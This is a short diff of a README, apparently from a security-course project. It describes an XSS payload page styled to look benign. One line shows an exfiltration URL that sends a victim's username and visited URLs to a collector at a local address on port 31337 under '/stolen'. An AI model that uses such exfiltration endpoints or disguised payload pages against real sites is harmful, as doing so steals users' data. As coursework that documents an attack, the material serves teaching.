plmcdowe/52600/README.md

 >>>> \- `http://192.168.1.1:31337/stolen?event=nav&user=<username>&url=<encoded_url>`
 >
 > **For the sake of space, I won't break out all of `xss_payload.html` here.**
-> **Comments throughout source should associate the purpose of functions with the criteria listed above.**
+> **Comments throughout source associate the purpose of functions with the criteria listed above.**
 >
-> **Below is snip of the HTML `<style>` to generate a reasonably benign looking site; and, a snip of the functions which generate the payloads as links in each of the icons found in the screen shot after the code.**
+> **Below is a snip of the HTML `<style>` to generate a reasonably benign looking site; and, a snip of the functions which generate the payloads as links in each of the icons found in the screen shot after the code.**
 >> ```html
 >> <meta charset="utf-8">
 >> <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>